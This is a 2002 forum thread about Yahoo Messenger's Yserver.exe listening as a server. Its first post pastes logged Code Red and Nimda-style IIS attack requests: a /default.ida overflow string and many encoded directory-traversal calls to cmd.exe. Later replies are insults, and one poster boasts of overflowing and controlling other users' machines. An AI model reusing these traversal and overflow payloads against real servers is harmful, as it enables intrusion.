In the recent build of yahoo messenger there is a pretty big flaw. When you first open it, it runs a file called Yserver.exe, which in turn announces to the internet your computer is a server. This doesn't sound too bad, but since hundreds if not thousands of computers are infected with worms, they will try to attack your computer as well. You can see evidence of this by opening your YServer.log file (C:/Program Files/Yahoo!/Messenger/Yserver.log) in notepad. The following describes what the attacks look like:
Code red worm: IP from = 218.49.232.235
02/17/102 23:00:16.820 02/17/102 23:00:17.310 00:00:00.490 218.49.232.235 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

IIS Attacks: IP from = 66.44.12.141 and 66.68.68.238
02/25/102 13:31:58.740 02/25/102 13:31:58.740 00:00:00.000 66.44.12.141 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 13:32:07.640 02/25/102 13:32:08.190 00:00:00.550 66.44.12.141 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 13:32:17.800 02/25/102 13:32:18.300 00:00:00.500 66.44.12.141 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:10.660 02/25/102 17:03:11.150 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:11.760 02/25/102 17:03:12.250 00:00:00.490 66.68.68.238 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:12.860 02/25/102 17:03:13.350 00:00:00.490 66.68.68.238 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:13.950 02/25/102 17:03:14.450 00:00:00.500 66.68.68.238 Get application/x-msdownload /d/winnt/system32/cmd.exe -1 0 .exe GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:15.050 02/25/102 17:03:15.550 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:16.210 02/25/102 17:03:16.700 00:00:00.490 66.68.68.238 Get application/x-msdownload /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:17.300 02/25/102 17:03:17.800 00:00:00.500 66.68.68.238 Get application/x-msdownload /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:18.350 02/25/102 17:03:18.840 00:00:00.490 66.68.68.238 Get application/x-msdownload /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:19.450 02/25/102 17:03:19.940 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:20.490 02/25/102 17:03:21.040 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%c0%2f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:21.590 02/25/102 17:03:22.080 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:22.630 02/25/102 17:03:23.130 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%c1%9c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:23.730 02/25/102 17:03:24.220 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:24.830 02/25/102 17:03:25.320 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:25.870 02/25/102 17:03:26.370 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%25%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:26.920 02/25/102 17:03:27.470 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%252f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

Luckily, this isnt harmful to most of you since you dont use a server at home, but there is probably a way to exploit this for other uses. By the way, if you want to find out where the attacking IP is located, go to http://visualroute.visualware.com/ type the ip in the box, and push enter. I even had one attack coming from some apartment place in Piano, Texas.

hit ctrl+alt+del and close Yserver .messenger still stays on but the worm is gone

w0rm my ass ... if u guys dunno wat it is dont hype it up

limp & mike u wanna talk bout it come over see me dogg and rob

Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : midsouth.rr.com IP Address. . . . . . . . . . . . : 24.165.145.32 Subnet Mask . . . . . . . . . . . : 255.255.252.0 Default Gateway . . . . . . . . . : 24.165.144.1

wtf r u guys talking bout? i can't undertand ANYTHING u guyz r say'n

they r talkin bout how to make a pie:D

its not new news to hear that yahoo sux we all knew this for the longest time but you are right this proves they extra suclz

you all hardcore up on this subject limpy why such a strong opinion? if i may ask *Hides in corner *

lol funny talking about yserver.exe lol lmfao do some real stuff sniff the data with commview and then you can see the real packets :-D www.commview.com get the shareware lol

lol...guys...ANY SERVER file can be used to trojan..once you have the server on your pc it opens a port up which can be exploited with certains trojans or certain worms.... if any1 want to know.. believe me if u want...but eh...some will know this is true

Shut the fock up $mev, i have a comp as server and i use Yahoo messanger, i never got a problem , FOCK UP damn newbies!

Pascal... u child.. this post was ages ago.. and u obviously know $hit... yes, a server carries. As limp said u fricking idiot "Which could mean nothing at all, or could mean something." READ BEFORE YOU MOUTH OFF.. and what am I a newbie to? Ur a newbie to this site, I've been on yahoo longer than you, ive probbly been living longer than you... whos a newbie? THINK BEFORE YOU SPEAK FRENCHIE.. and btw.. I know who u are

*points and laughs at pascal*

Oh $vev man ! tell me the name of the TROJAN than u speak a lot,
no response ???
U GET PISSED LOL

Smev isn;t lying/... Tehre is a server file... It has somethign to do with the yahoo updater :)... I'm such a pimp.. Smev it is highly vunerable being something new.... And yes you cna over flow and control other machines with this server file....The extent i have been able to use it is yahoo options only.. I haven;t been able tyo get outta others messengers... and into other files on their comp... in time..I should have spent more time with altering torjans hehehe.. cuz all i doing is altering a server file here hehehe.....Who hsould i completely own once i learn?

pascal it is NOT a trojan mearly a way for yahoo to connect to your comp and update or tellyou there is an update...

just testin my italic id, nvm me :)

Yes your right kane, that $mev is a real loser

hmmm, nah, smev is cool with me

Pascal? Are u stupid? Little kid.. before you go posting $hite find out your facts, thx pope.. u2 sugar plum ;) LOL

The light shines down on pascal as everyone considers him a little rascal, actual fact of the matter he is a bug stain splatter on someones window, just annoying to the point of wanting to kill him again, and stab the mother phucka with a ink pen

Pascal seems like the kinda person that would **** a man and not even have the common courtesy to give him a reach around. That could be all the beer talking though ;p.. but i doubt it.

lol, wood, nice rhyme, and idbeholda, nice full metal jacket quote...hehe, im not gonna get into this, but it seems kane/ smev / both seem to know more than this pascal guy, so i am on their side...

You know it goku,

Anyone who stands up to me i'll tear em up into toefu
Yo you pacal, phuck the little racals show em your muscles
And they'll know you can't hussle a dime
Plus you are wack and out of line
Its a crime that my name is wood
and i just could become the next great white hope
spendin most of my days smokin to much phuckin dope
i'll put the knife to his throat like it was the old mans rope
you can't cope with the ways i put it to you
i'll zip you up in a body bag with supaglue
your favorite homo is a pikachu
goin to the doctor cause you thinks you got a flu
actually you just going so you can bend over
and watch wood roll on 20's in a range rover

hehehe, INDIANA what!

LOL... i think thats the best way I've EVER heard it put ;)

Heh, tru tru!
Man...smev honestly though i don't think anyone will be able to make underscores or rares again, there is still exploits out there but for me i always get so close and choke.

yea i did make an ASCII once...and well i think i could figure it out once again, but i dont seem to want to try.